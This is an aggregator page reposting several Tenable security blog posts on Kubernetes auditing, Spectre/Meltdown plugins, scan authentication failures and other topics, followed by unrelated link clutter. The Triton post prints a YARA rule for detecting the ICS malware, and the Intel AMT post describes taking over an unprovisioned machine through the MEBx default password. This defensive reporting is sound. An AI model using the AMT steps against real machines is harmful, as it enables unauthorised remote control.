breaches, as they should be. But they also need to lead the way in basic
security practices that keep their customer and critical business data safe. It
seems there is a need for a “top down” approach where organizations provide
comprehensive cybersecurity, but also team up with customers and employees to
educate them about what they can do extend their best practices across their own
personal attack surface. This starts with companies being more transparent about
their own security practices and holding themselves accountable for lapses. If
they don’t make security a top business priority and they aren’t sensitive to
these changing consumer patterns and needs, they risk losing customers. Today,
being customer-focused isn’t just about making good products; it’s about
listening to customers and making sure the products and services they are using
don’t cause them harm.

The irony is that cyber poses an existential threat to our economy and our very
social fabric – safeguarding ourselves is therefore a shared responsibility.
Enterprises must lead the way by practicing fundamental hygiene and enforcing a
basic standard of care for their customers’ data. But individuals must do their
part, too – both as consumers and, in many cases, as employees of those same
enterprises – and that starts with cyber literacy. 

Survey methodology:

This survey was conducted online within the United States by Harris Poll on
behalf of Tenable from November 28-30, 2017 among 2,196 U.S. adults ages 18 and
older. This online survey is not based on a probability sample and therefore no
estimate of theoretical sampling error can be calculated. For complete survey
methodology, including weighting variables and subgroup sample sizes, please
contact Sarah Spitz of Bateman Group at 347-382-9731. 



Image may be NSFW.
Clik here to view.





CONGRESS ACHIEVES REAL IT MODERNIZATION PROGRESS

December 19, 2017, 5:00 am
Next Auditing Kubernetes for Secure Configurations
Previous New Study: Many Consumers Lack Understanding of Basic Cyber Hygiene
0
0
Image may be NSFW.
Clik here to view.

We’ve talked about the need for Congress to prioritize upgrading and modernizing
government IT systems for a while now, so we were glad to see the Senate
recently pass the 2017 National Defense Authorization Act (NDAA) with the
Modernizing Government Technology (MGT) Act intact. The MGT Act (HR 2227),
introduced by Rep. Will Hurd (R-TX), was signed into law last Tuesday.

Federal IT modernization is a critical component of strong government
cybersecurity, and the necessity for this bill is clearer than ever. Recently,
the House Oversight and Government Reform Subcommittee on Information
Technology, which Rep. Hurd chairs, gave several federal agencies failing grades
for their efforts around IT modernization in the latest Federal IT Acquisition
Reform Act (FITARA) scorecard. Encouragingly, chairman Hurd plans to include the
MGT Act’s requirements for agencies to establish working capital funds as a
category in a future scorecard.

Rep. Hurd’s goal for FITARA to evolve into a digital Cyber Exposure scorecard
would help agencies more clearly assess their risk, because, as he noted
recently, legacy technology poses both a financial and cybersecurity risk to our
nation. Chief among those threats is the inability to identify it as part of a
rapidly expanding amount of assets. Agencies need to be able to take a modern
approach to cybersecurity that includes live discovery of every asset, whether
it’s an old server or an iPad, and continuous visibility into where those assets
are secure or exposed. All organizations now face an elastic attack surface,
where the constantly evolving number of assets and their vulnerabilities has led
to a gap in the ability to understand their overall cyber risk.

The MGT Act will help close that gap by establishing a capital fund, so agencies
can purchase the modern tools necessary for a comprehensive view of their Cyber
Exposure. The cyber funding in the bill also ensures that security is part of
future modernization efforts. Further, the MGT Act could save billions in
taxpayer dollars given that more than $64 billion is currently spent just to
operate and maintain legacy IT systems annually.

The MGT Act is smart public policy, and it’s encouraging to see bipartisan
progress from the IT subcommittee on such a critical cybersecurity issue,
including chairman Hurd, ranking member Kelly (D-IL), and Reps. Connolly (D-VA)
and Gianforte (R-MT). Yet, there is more to be done. Rep. Hurd’s next stated
focus on developing a “cyber corps” will help ensure that the federal government
has access to the people and skills they need to adequately prevent and respond
to cyberthreats. We also need to explore how advanced technologies like quantum
computing and blockchain may be used to mitigate threats. We look forward to
supporting these and other efforts to modernize the federal government’s
approach to cybersecurity next year.

Image may be NSFW.
Clik here to view.

Search
RSSing.com

--------------------------------------------------------------------------------





AUDITING KUBERNETES FOR SECURE CONFIGURATIONS

December 28, 2017, 5:00 am
Next Triton: What You Need to Know
Previous Congress Achieves Real IT Modernization Progress
0
0
Image may be NSFW.
Clik here to view.

Over the last few years, container technology has gained traction in enterprise
environments. And, as a result, use of containerized applications has exploded
in the enterprise. Naturally, as its adoption increased, management platforms
such as Kubernetes were developed to manage containerized applications. They’ve
now become critical to any modern DevOps-focused infrastructure. Tenable
recently released an audit to help customers secure this key piece of
infrastructure in their environments.


WHAT’S KUBERNETES?

Kubernetes is an open-source orchestration platform for deploying, maintaining
and scaling containerized applications. Kubernetes was originally developed by
Google, and later donated to the Cloud Native Computing Foundation. By
leveraging Kubernetes, organizations can:

 * Deploy applications in a predictable manner
 * Scale workloads up and down
 * Limit resource utilization
 * Increase availability through self-healing capabilities


WHY USE KUBERNETES?

Organizations choose Kubernetes over other orchestration platforms for many
reasons:

 * Kubernetes is open source, and part of the Cloud Native Computing Foundation,
   which has an impressive list of member organizations
 * Vendor lock-in is reduced, as deployments can leverage bare metal, virtual
   machines and public or private cloud – or a combination thereof
 * Kubernetes can be used for all size deployments – from single cluster to a
   scaled-up, federated platform orchestrating multiple geographically diverse
   clusters
 * Vanilla Kubernetes can easily be extended with enterprise-grade options such
   as Tectonic, Rancher and OpenShift


WHY AUDIT KUBERNETES CONFIGURATION?

Depending on the workloads run on Kubernetes, you may consider it a core piece
of network infrastructure. After all, it could be hosting the external
applications that generate revenue for your business, sensitive internal
applications, customer information and more.

Auditing security configurations of such platforms should therefore be an
important part of any organization’s security program. A secure configuration
audit provides a level of assurance that an information system is configured
based on industry standard best practice recommendations.

To protect an information system, you need to account for every flaw that may
exist, while an attacker may only need to find a single flaw to exploit. As an
example, a recommended configuration is to only allow https traffic to the API
server. If the traffic was not encrypted, it may be possible for an attacker to
obtain sensitive information such as secrets and keys, and potentially take over
control of the cluster. The good news is that Tenable customers now have the
ability to perform a configuration audit of your Kubernetes based on the Center
for Internet Security (CIS) benchmark.


CIS KUBERNETES BENCHMARK

The CIS recently released the CIS Kubernetes Benchmark, which provides detailed
guidance to securely configure core components of Kubernetes, including the
Master Node, Worker Node and Federated Deployments.

MASTER NODE(S)

Responsible for managing the workload within the cluster. Services include:

 * etcd: A key-value data store for cluster configuration
 * API server: A REST service that provides an interface into Kubernetes; state
   is stored in etcd
 * Scheduler: Intelligently determines which nodes workloads should be assigned
   to
 * Controller manager: A process that controllers like the DaemonSet and
   Replication controller run in; controllers access the API to manage resources

WORKER NODES

Responsible for running workloads within the cluster. Services include:

 * Kubelet: Responsible for monitoring the health of containers
 * Kube-proxy: Acts as proxy and load balancer for the containers running on the
   node
 * Container runtime: The service which runs the containers, such as Docker

FEDERATED DEPLOYMENTS

Function similar to Master Nodes, except they manage clusters instead of worker
nodes. Services include:

 * Federation API server
 * Federation Controller Manager

Federation is not required in all deployments, so this section may not apply to
your organization.


HOW TO GET STARTED

To get started, log into Tenable.io and create a new Policy Compliance Auditing
scan. In your scan configuration, select the Compliance tab. Under UNIX, CIS
Kubernetes Benchmarks are now available. Due to Kubernetes’ deployment
flexibility, the audit utilizes variables to ensure the checks are specific to
your deployment.

Image may be NSFW.
Clik here to view.

Once the configuration is saved, run the scan and review the results.  Below is
sample output from a scan. For simplicity, only results from the worker node are
displayed.

Image may be NSFW.
Clik here to view.

Below is a closer view of one of the results. This page shows:

 * Pass/fail status
 * Remediation steps, if necessary
 * Individual results from the systems scanned

Image may be NSFW.
Clik here to view.

Also, note the reference to cybersecurity frameworks and standards on the right
(in the Reference Information section). In this example, the controls listed
are:

 * ITSG-33: CM-6 – configuration settings
 * CIS CSCv6 - 9.1 – ensure that only ports, protocols and services with
   validated business needs are running on each system
 * NIST 800-50: CM-6 – configuration settings
 * NIST CSF: PR.IP-1 – a baseline configuration of information
   technology/industrial control systems is created and maintained
 * NIST 800-171: 3.4.2 – establish and enforce security configuration settings
   for IT products employed in organizational information systems

 

Depending on the cybersecurity framework your organization follows, you can map
these compliance results to the controls to assist you in demonstrating
compliance.


WRAP-UP: PLANNING A KUBERNETES DEPLOYMENT

When planning a Kubernetes deployment, it’s important to:

 * Create or adopt a secure configuration
 * Determine how you’ll monitor the configuration
 * Establish how frequently you’ll review the configuration

At Tenable, we regularly update our policy compliance audits to match the newest
versions by Center for Internet Security (CIS) and Defense Information Systems
Agency (DISA). In some cases, we produce our own best practice audits. We also
realize there are many cybersecurity frameworks available for organizations to
follow, so we regularly map the checks in the policy compliance audits to
various framework controls.

Learn more about Tenable.io.





Image may be NSFW.
Clik here to view.





TRITON: WHAT YOU NEED TO KNOW

January 2, 2018, 1:31 pm
Next The First Major Security Logos of 2018: Spectre and Meltdown
Vulnerabilities
Previous Auditing Kubernetes for Secure Configurations
0
0
Image may be NSFW.
Clik here to view.

Correction: An earlier version of this post identified the protocol used as the
TSAA protocol. This malware uses the TriStation protocol, which is proprietary
and undocumented. Thanks to Jimmy Wylie for the correction.


WHAT IS TRITON?

Triton is a new malware framework targeting safety systems monitoring SCADA
networks. It’s designed to run from within a compromised network, allowing the
attacker to observe and control Triconex Safety Instrumented System (SIS)
devices.

It has been reported that the attackers copied a malicious file (trilog.exe)
onto a management workstation, a Windows PC, and used that vantage point to
attempt to write new firmware to the memory of SIS devices.

Device firmware is designed to be updated remotely. A physical key on the front
of the device allows the user to switch between a PROGRAM mode, where
modifications are allowed, and others, such as read-only RUN. The attackers used
this capability as designed and relied on users to have left the device in
PROGRAM mode.

Although Triton did not leverage any vulnerabilities, Nessus can identify the
early stages of the attack.


WHICH DEVICES WERE ATTACKED BY TRITON?

Triton attacked Triconex Main Processors, model 3008. These safety monitoring
systems were approved for use by the United States Nuclear Regulatory Commission
in 2012.


WHAT’S THE IMPACT?

If successful, this attack could have run arbitrary code on critical safety
monitoring systems, concealing or causing physical damage to monitored systems.


DID THE ATTACKERS NEED TO REVERSE ENGINEER THE DEVICES?

The attackers didn’t necessarily reverse engineer the devices. The US Nuclear
Regulatory Commission maintains copies of the programming guides and
communications manuals in use at the time of their approval. Appendix D
documents the TSAA (TriStation) protocol, including the WRITE_TRICON_DATA
command this malware likely used.

The protocol is simple, and has no authentication. The only facet of security it
supplies is a per-message CRC.


TENABLE COVERAGE OF TRITON

MALWARE DETECTION PLUGIN

Tenable can detect if the management station contains Triton through its malware
detection plugin. Here’s an example of a Triton hash detected with the Malicious
Process Detection plugin ID 59275:

YARA DETECTION

Tenable customers can also use YARA rules to identify affected systems through
the Malicious File Detection Using Yara Nessus plugin. Here’s a sample rule that
can be used with Nessus to detect Triton:

rule TRITON_ICS_FRAMEWORK
{
meta:
author = "nicholas.carr @itsreallynick"
md5 = "0face841f7b2953e7c29c064d6886523"
description = "TRITON framework recovered during Mandiant ICS incident response"
strings:
$python_compiled = ".pyc" nocase ascii wide
$python_module_01 = "__module__" nocase ascii wide
$python_module_02 = "<module>" nocase ascii wide
$python_script_01 = "import Ts" nocase ascii wide
$python_script_02 = "def ts_" nocase ascii wide

$py_cnames_01 = "TS_cnames.py" nocase ascii wide
$py_cnames_02 = "TRICON" nocase ascii wide
$py_cnames_03 = "TriStation " nocase ascii wide
$py_cnames_04 = " chassis " nocase ascii wide

$py_tslibs_01 = "GetCpStatus" nocase ascii wide
$py_tslibs_02 = "ts_" ascii wide
$py_tslibs_03 = " sequence" nocase ascii wide
$py_tslibs_04 = /import Ts(Hi|Low|Base)[^:alpha:]/ nocase ascii wide
$py_tslibs_05 = /module\s?version/ nocase ascii wide
$py_tslibs_06 = "bad " nocase ascii wide
$py_tslibs_07 = "prog_cnt" nocase ascii wide

$py_tsbase_01 = "TsBase.py" nocase ascii wide
$py_tsbase_02 = ".TsBase(" nocase ascii wide

$py_tshi_01 = "TsHi.py" nocase ascii wide
$py_tshi_02 = "keystate" nocase ascii wide
$py_tshi_03 = "GetProjectInfo" nocase ascii wide
$py_tshi_04 = "GetProgramTable" nocase ascii wide
$py_tshi_05 = "SafeAppendProgramMod" nocase ascii wide
$py_tshi_06 = ".TsHi(" ascii nocase wide

$py_tslow_01 = "TsLow.py" nocase ascii wide
$py_tslow_02 = "print_last_error" ascii nocase wide
$py_tslow_03 = ".TsLow(" ascii nocase wide
$py_tslow_04 = "tcm_" ascii wide
$py_tslow_05 = " TCM found" nocase ascii wide

$py_crc_01 = "crc.pyc" nocase ascii wide
$py_crc_02 = "CRC16_MODBUS" ascii wide
$py_crc_03 = "Kotov Alaxander" nocase ascii wide
$py_crc_04 = "CRC_CCITT_XMODEM" ascii wide
$py_crc_05 = "crc16ret" ascii wide
$py_crc_06 = "CRC16_CCITT_x1D0F" ascii wide
$py_crc_07 = /CRC16_CCITT[^_]/ ascii wide

$py_sh_01 = "sh.pyc" nocase ascii wide

$py_keyword_01 = " FAILURE" ascii wide
$py_keyword_02 = "symbol table" nocase ascii wide

$py_TRIDENT_01 = "inject.bin" ascii nocase wide
$py_TRIDENT_02 = "imain.bin" ascii nocase wide

condition:
2 of ($python_*) and 7 of ($py_*) and filesize < 3MB
}


WHAT CAN YOU DO TO PROTECT YOUR ORGANIZATION FROM TRITON?

Ensure all Tricon processors are not in PROGRAM mode. A physical key on each
device can prevent this malware from succeeding. After initial programming of
the device is complete, the key should be switched to RUN or REMOTE.

You should monitor management stations for malware. These are highly valuable
pivot points to the Distributed Control System network.

Tricon devices can be configured with an IP or subnet whitelist. You should
configure this access control to only allow communication from management
stations and the DCS and SIS networks. This will limit the use of active
security controls within these networks, which is why a monitoring solution such
as Nessus Network Monitor is essential.


STAY TUNED FOR MORE UPDATES

Tenable is keeping a close eye on this story as it develops. Our team will
release coverage as information becomes available, and this post will be updated
if new plugins are released.

Image may be NSFW.
Clik here to view.







THE FIRST MAJOR SECURITY LOGOS OF 2018: SPECTRE AND MELTDOWN VULNERABILITIES

January 4, 2018, 11:54 am
Next Tracking Scan Authentication Failures
Previous Triton: What You Need to Know
0
0
Image may be NSFW.
Clik here to view.

A major flaw in the way modern CPUs access cache memory could allow one program
to access data from another program. The latest security vulnerability affects a
majority of systems, if not all, used today. The vulnerabilities are named
Spectre and Meltdown and also have a dedicated website.

According to the security advisory, Spectre breaks the isolation between
different applications and allows an attacker to expose data once thought to be
secure. Meltdown breaks the most fundamental isolation between user applications
and the operating system. Both attacks are independent of the operating system
and do not rely on any software vulnerabilities. To reduce the risk of
compromise, users must apply software patches as quickly as possible.


SIDE CHANNEL ATTACKS

The new bugs are considered side channel attacks since they use side channels to
obtain the information from the accessed memory location. Spectre allows an
application to force another application to access arbitrary portions of its
memory, which can then be read through a side channel. This unique side channel
attack is done by speculative execution, a technique used by high-speed
processors in order to increase performance by guessing likely future execution
paths and preemptively executing the instructions in them. Spectre takes
advantage of this execution and affects all modern processors capable of keeping
instructions in flight.

Furthermore, memory isolation is a cornerstone of security and the environment
that allows multiple processes to be run on a device. The Meltdown bug allows
any application to access all system memory including memory allocated to the
kernel and overcomes the memory isolation. The unique side channel attack is one
side effect caused by out-of-order execution that is used as a performance
enhancement for processors. Meltdown specifically affects every Intel processor
on all desktop, laptop and cloud computers except Intel Itanium and Intel Atom
before 2013.


IDENTIFYING AFFECTED SYSTEMS

Operating system vendors are forgoing regular patch release cycles and
publishing operating system patches to address this issue. Tenable.io,
SecurityCenter and Nessus can identify affected systems by looking for the newly
released patches. Each plugin created for the Spectre and Meltdown
vulnerabilities will be marked with at least one of the following CVEs :

 * CVE-2017-5753: Systems with microprocessors utilizing speculative execution
   and branch prediction may allow unauthorized disclosure of information to an
   attacker with local user access via a side-channel analysis.
 * CVE-2017-5715: Systems with microprocessors utilizing speculative execution
   and indirect branch prediction may allow unauthorized disclosure of
   information to an attacker with local user access via a side-channel
   analysis.
 * CVE-2017-5754: Systems with microprocessors utilizing speculative execution
   and indirect branch prediction may allow unauthorized disclosure of
   information to an attacker with local user access via a side-channel analysis
   of the data cache.

To identify which systems are affected using Tenable.io, open the workbench and,
using the advanced search, apply a CVE filter
(CVE-2017-5753,CVE-2017-5715,CVE-2017-5754) as shown below. In the example
filter, each CVE is placed in the field separated using a comma.

Image may be NSFW.
Clik here to view.


PLUGINS

When searching for the plugins using CVE you will find several plugins. This
list will be updated as more plugins are released.

Vendor

Plugin ID

Description

Amazon

105517

Amazon Linux AMI : kernel (ALAS-2018-939)

Microsoft

105547

KB4056888: Windows 10 Version 1511 January 2018 Security Update
(Meltdown)(Spectre)

Microsoft

105548

KB4056890: Windows 10 Version 1607 and Windows Server 2016 January 2018 Security
Update (Meltdown)(Spectre)

Microsoft

105549

KB4056891: Windows 10 Version 1703 January 2018 Security Update
(Meltdown)(Spectre)

Microsoft

105550

KB4056892: Windows 10 Version 1709 January 2018 Security Update
(Meltdown)(Spectre)

Microsoft

105551

KB4056893: Windows 10 LTSB January 2018 Security Update (Meltdown)(Spectre)

Microsoft

105552

KB4056897: Windows 7 and Windows Server 2008 R2 January 2018 Security Update
(Meltdown)(Spectre)

Microsoft

105553

KB4056898: Windows 8.1 and Windows Server 2012 R2 January 2018 Security Update
(Meltdown)(Spectre)

Red Hat

105523

RHEL 7 : kernel (RHSA-2018:0007)

Red Hat

105524

RHEL 6 : kernel (RHSA-2018:0008)

Red Hat

105525

RHEL 7 : kernel (RHSA-2018:0009)

Red Hat

105526

RHEL 7 : kernel (RHSA-2018:0010)

Red Hat

105527

RHEL 6 : kernel (RHSA-2018:0011)

Red Hat

105528

RHEL 7 : microcode_ctl (RHSA-2018:0012)

Red Hat

105529

RHEL 6 : microcode_ctl (RHSA-2018:0013)

Red Hat

105530

RHEL 7 : linux-firmware (RHSA-2018:0014)

Red Hat

105531

RHEL 7 : linux-firmware (RHSA-2018:0015)

Red Hat

105532

RHEL 7 : kernel-rt (RHSA-2018:0016)

Red Hat

105533

RHEL 6 : kernel (RHSA-2018:0017)

Scientific Linux

105534

Scientific Linux Security Update : kernel on SL6.x i386/x86_64

Scientific Linux

105535

Scientific Linux Security Update : kernel on SL7.x x86_64

Scientific Linux

105536

Scientific Linux Security Update : microcode_ctl on SL6.x i386/x86_64

Scientific Linux

105537

Scientific Linux Security Update : microcode_ctl on SL7.x x86_64

SUSE

105539

SUSE SLED12 / SLES12 Security Update : ucode-intel (SUSE-SU-2018:0006-1)

SUSE

105540

SUSE SLED12 / SLES12 Security Update : qemu (SUSE-SU-2018:0007-1)

SUSE

105541

SUSE SLES11 Security Update : microcode_ctl (SUSE-SU-2018:0009-1)

VMware

105485

VMware Fusion 8.x < 8.5.9 Multiple Vulnerabilities (VMSA-2017-0021)
(VMSA-2018-0002) (Spectre) (macOS)

VMware

105555

VMware Player 12.x < 12.5.8 Multiple Vulnerabilities (VMSA-2017-0021)
(VMSA-2018-0002) (Spectre)

VMware

105487

VMware Workstation 12.x < 12.5.8 Multiple Vulnerabilities (VMSA-2017-0021)
(VMSA-2018-0002) (Spectre)

VMware

105486

ESXi 5.5 / 6.0 / 6.5 / Multiple Vulnerabilities (VMSA-2017-0021)
(VMSA-2018-0002) (Spectre) (remote check)


WRAPPING UP

We will continue to research these vulnerabilities, and investigate different
ways to detect them. When new information is available, we will release
additional plugins. This vulnerability is a real and present danger to all
organizations and should be patched immediately. While Microsoft, Red Hat,
VMWare and other vendors are making efforts to release patches, organizations
are responsible for applying those patches as soon as possible.

Image may be NSFW.
Clik here to view.





TRACKING SCAN AUTHENTICATION FAILURES

January 11, 2018, 5:00 am
Next Intel AMT Back in the News
Previous The First Major Security Logos of 2018: Spectre and Meltdown
Vulnerabilities
0
0
Image may be NSFW.
Clik here to view.

IT systems change all the time. New applications are added, configurations are
changed, permissions get revised – the list goes on and on. In some cases, the
changes end up restricting access to the system. For example, user accounts are
removed, access is revoked, account credentials change or expire, leading to
unexpected authentication failures and lockouts. And when the credentials fail,
applications that depend on them fail, too.

When the application that ends up failing is a vulnerability scanner (such as
Nessus), it could significantly impact an organization. Most organizations run
vulnerability scans on a weekly or a monthly schedule, so a missed scan (due to
authentication failure) could result in missed vulnerabilities, leaving systems
within an organization exposed to those vulnerabilities for weeks, if not
months, before the failures are identified and rectified.

To help our customers identify such failures earlier and resolve issues sooner,
we recently released a new plugin, which consolidates authentication failures
across various protocols and reports them in a single plugin.

The plugin runs toward the end of a scan and collects results from the entire
scan to provide a consolidated report. The plugin needs to be enabled in the
scan policy for it to provide a report. Also, note the plugin will not report
authentication failures for any host that Nessus is able to successfully
authenticate to for a given protocol.

The plugin currently reports authentication failures for the following
protocols/technologies:


SSH

The plugin reports detailed information on authentication failures on a
per-credential basis. As an example, if the scan policy had three credentials
defined, and each one of them failed for one reason or another, it will provide
a report on each user credential that failed and the reason it failed.

Here’s an SSH example:

Image may be NSFW.
Clik here to view.


SMB

The plugin reports authentication failures on a per-credential basis for SMB as
well.

Here’s an example:

Image may be NSFW.
Clik here to view.


DATABASE AUTHENTICATION

If database credentials are provided as part of the scan, and the credentials
fail for one or more database technologies (e.g., MySQL, Oracle), this plugin
will report those failures as well.

Here’s an example of database credential failure output:

Image may be NSFW.
Clik here to view.


IBM ISERIES

If IBM iSeries credentials are provided as part of the scan and Nessus fails to
authenticate, the plugin will report authentication failure along with a reason
why it failed.

Here’s an example:

Image may be NSFW.
Clik here to view.


WRAP-UP

For Nessus to perform an accurate and complete vulnerability scan, it needs
credentials with appropriate privileges to do its job. We realize providing the
right set of credentials and privileges to perform the scan is a challenging
problem. And recently, we’ve released additional functionality to help solve
some of those problems.

But a failed scan due to incorrect credentials shouldn’t be left unattended for
a long time since it could have a huge unintended impact. The last thing you
want is to be lulled into a false sense of safety while your environment changes
around you.

Therefore, tracking such failures sooner should be a top priority for any
organization. With the release of this new plugin, we hope our customers can do
just that.

Image may be NSFW.
Clik here to view.





INTEL AMT BACK IN THE NEWS

January 12, 2018, 4:58 pm
Next CDM: Making US Federal Agencies More AWARE of Cyber Exposure
Previous Tracking Scan Authentication Failures
0
0
Image may be NSFW.
Clik here to view.

The release of new research from F-Secure spells more trouble for Intel’s Active
Management Technology (AMT). AMT is used for remote access monitoring and
maintenance in corporate environments. Previously, in 2017, researchers
discovered a critical vulnerability with AMT that made headlines. The previous
vulnerability was a wide-reaching privilege escalation vulnerability
(INTEL-SA-00075, CVE-2017-5689). Now, AMT is in the news again this week, as
another serious security issue has been disclosed. The issue was discovered by a
security researcher with the Finnish security company F-Secure. It could allow
an attacker who has physical access to an affected device to enable the
technology’s remote access features, letting them take complete control of a
machine while on the same network segment.


DETAILS

The F-Secure advisory explains that an attacker who has physical access to the
device can simply reboot the machine and press CTRL+P during bootup to access
the Intel Management Engine BIOS Extension (MEBx) login. If Intel AMT hasn’t
already been provisioned by the device owner or corporate IT, the MEBx login is
only protected by a default password of admin. By accessing the MEBx
configuration, an attacker could enable remote access and set AMT’s user opt-in
to “None,” allowing the attacker to gain remote access to the device without the
user’s consent. This gives the attacker the ability to take full control of the
machine if they’re on the same wired or wireless network.

While the likelihood of an attack is decreased due to the requirement of
physical access to the device, the exploitation of this issue is both extremely
simple and takes very little time to execute for a reasonably skilled attacker.
Security professionals often warn users not to leave a laptop in a hotel room or
other unsecured location where the device is unattended. If the computer is left
unattended, the attacker has an opportunity to reboot the system, alter the MEBx
configuration and be gone – all before the user returns. A simple flaw such as
this becomes a gold mine for an attacker determined to target an individual or
organization.


DETECTION METHODS

New plugins have been released for Tenable.io Vulnerability Management,
SecurityCenter and Nessus to determine whether a device has Intel AMT remote
access enabled and running. Plugin #105778, Intel Management Engine Active
Management Technology [AMT] Remote Access Enabled, detects whether the Intel AMT
remote access feature is enabled based on the banner of the service listening on
port 16992. Using a previously released plugin, #102992, Intel Active Management
Technology (AMT) detection, you can identify systems potentially at risk for
this new vulnerability without scanning again.

Image may be NSFW.
Clik here to view.


SCAN POLICY MODIFICATIONS

The default port scanning preferences need to be modified to enable detection of
this vulnerability. The port scanning preferences need to be set to probe ports
16992, 16993 and 623 as well as the default ports. Also, you should scan the
system using the SYN and TCP network scanners in addition to the local scanner
option, as the local enumerator is unable to enumerate the Intel AMT ports.

Image may be NSFW.
Clik here to view.

To check whether your system supports Intel AMT, you can use the plugins
mentioned above. Alternatively, you may check your BIOS manually for Intel AMT
and MEBx technologies by pressing CTRL-P during the boot process. Intel has also
provided a reference document to help determine if you have an Intel AMT, Intel
SBA or Intel ISM capable system.


WRAPPING UP – WHAT YOU CAN DO RIGHT NOW

Here are a few suggestions on what you can do right now to protect your
organization from this newly discovered vulnerability:

 * If your organization has devices that support Intel AMT technology and the
   Intel Management Engine BIOS Extension, log into the MEBx menu and set a
   strong password to replace the default password of admin. And if you don’t
   plan to use Intel AMT, consider disabling it.
 * Given the physical proximity required for this particular attack to be
   executed, remind users to always be mindful of operational security: Don’t
   leave laptops unattended in unsecured locations.
 * Get plugin #105778, Intel Management Engine Active Management Technology
   [AMT] Remote Access Enabled, which detects whether the Intel AMT remote
   access feature is enabled based on the banner of the service listening on
   port 16992.
 * Learn more about Tenable.io, which we continuously update, so you can detect
   the latest vulnerabilities quickly.

Image may be NSFW.
Clik here to view.

Viewing all 1364 articles
First Page ... Page 32 Page 33 Page 34 Page 35 Page 36 ... Last Page
Browse latest View live



--------------------------------------------------------------------------------

More Pages to Explore .....
 * //vincidg42.rssing.com/chan-74108839/index-latest.php
 * //misrepresentation254.rssing.com/chan-59341948/index-page1.html
 * //welmer11.rssing.com/chan-12633547/article9.html
 * //knees965.rssing.com/chan-44237576/index-latest.php
 * //conference5886.rssing.com/chan-29928699/index-latest.php
 * //hygiene1644.rssing.com/chan-12633046/index-latest.php
 * //kelch21.rssing.com/chan-29928904/index-latest.php
 * //arantes40.rssing.com/chan-29928427/article7.html
 * //greenpages92.rssing.com/chan-29928833/index-page1.html
 * //animalfeasance139.rssing.com/chan-44238070/index-latest.php
 * //videogp21.rssing.com/chan-12632661/article10.html
 * //gasol346.rssing.com/chan-44237885/index-page1.html
 * //meade154.rssing.com/chan-12633037/article37.html
 * //coffeefanatic1.rssing.com/chan-2071696/index-page1.html
 * //cymbidium72.rssing.com/chan-2071878/article132.html
 * //cmvreud1.rssing.com/chan-2071684/index-page1.html
 * //plotormedext2.rssing.com/chan-59341716/index-latest.php
 * //distillery567.rssing.com/chan-74109697/article5.html
 * //surrounding868.rssing.com/chan-12632641/index-page1.html
 * //gaming6229.rssing.com/chan-12632772/index-page1.html

av-override
00:04
/
01:08
Replay








Read More

--------------------------------------------------------------------------------

click here for Latest and Popular articles on Electronic Design Automation (EDA)
click here for Latest and Popular articles on Mesothelioma and Asbestos

--------------------------------------------------------------------------------

Search
RSSing.com

--------------------------------------------------------------------------------


TOP-RATED IMAGES


कार्यविभाजन टुंगो नलाग्दा स्वास्थ्य प्राविधिक सचिव डा. पोखरेल जिम्मेवारीविहीन


SEROLD BROOKS


RASCALS (2011) FULL MOVIE HINDI 350MB HDRIP 480P ESUBS


MARY BETH MCANDREWS’ FAVORITE UNDERSEEN FOUND FOOTAGE FILMS


PHILIPS MAGNAVOX - 20PT6245/37 - MAIN SMPS - DVD POWER - SCHEMATIC


SADIQ - AKPELLA (2016)


CBSE CLASS 10 ENGLISH GRAMMAR – EDITING TASK


PLEASE READ MY PALM:)


AMZ MINI BOOSTER SMD


PINTEREST


MARK CHAO 赵又廷 ~ GOES SOLO FOR L’OFFICIEL (CHINA) JULY...


ANGELIKA HEADLEE, 62, KIMBALL, MICHIGAN


A TRIBUTE: LI HONGYI, FUTURE PM NOT TO BE, REMEMBERING HIS LIFETIME ACHIEVEMENT


THERE IS, THERE ARE


WEAPONS CHARGES & ENDANGERING THE WELFARE OF A CHILD


TEXAS: AUSTIN TEXAS POLICE REPORT DWI ARREST BOOKINGS IN TRAVIS COUNTY JAIL FOR
NOV. 1, 2019


DEADLY DUO: STEPHANIE LYNN MARTIN AND WILLIAM M. BUSENBURG


TERRENCE MCNEILL


PETER DARRELL TRIMINGHAM


PANINI - ADRENALYN XL FIFA 365 2017 (05) - NORDIC EDITION - CHECKLIST



LATEST IMAGES


LAST VALID VALUE , CURRENT VALUE

January 25, 2022, 5:40 am


THE ELDEN RING DIGITAL ISSUE IS NOW LIVE

January 28, 2022, 2:01 pm


SCHUYLKILL COUNTY WEATHER FORECAST FOR FRIDAY, JANUARY 28TH, 2022

January 28, 2022, 10:53 am


CLOSE UP INTERVIEW

January 27, 2022, 8:21 pm


FORTNITE: SPIDER-MAN NEMESIS GREEN GOBLIN HAS GLIDED INTO THE BATTLE ROYALE

January 27, 2022, 4:09 pm


DUMP TRUCK CRASH SHUTS DOWN ROUTE 1A FOR MORE THAN 2 HOURS

January 27, 2022, 1:36 pm


THE 26 BEST FACE MASKS FOR RUNNING, CYCLING & WORKING OUT: UNDER ARMOUR,...

January 26, 2022, 1:00 pm


DEVELOPING METAVERSE: YOUR FIRST VR GAME IN UNREAL ENGINE

January 26, 2022, 12:55 pm


VP LENI ANGAT SA IBA. TALO SI MARCOS

January 25, 2022, 10:39 pm


ROLLING STONES - 1969-12-09 OLYMPIC SOUND STUDIOS, LONDON, UK, STUDIO SESSION

January 25, 2022, 1:48 pm


LAST VALID VALUE , CURRENT VALUE

January 25, 2022, 5:40 am


THE ELDEN RING DIGITAL ISSUE IS NOW LIVE

January 28, 2022, 2:01 pm


click here for Latest and Popular articles on SAP ERP
 * RSSing>>
 * Latest
 * Popular
 * Top Rated
 * Trending

© 2022 //www.rssing.com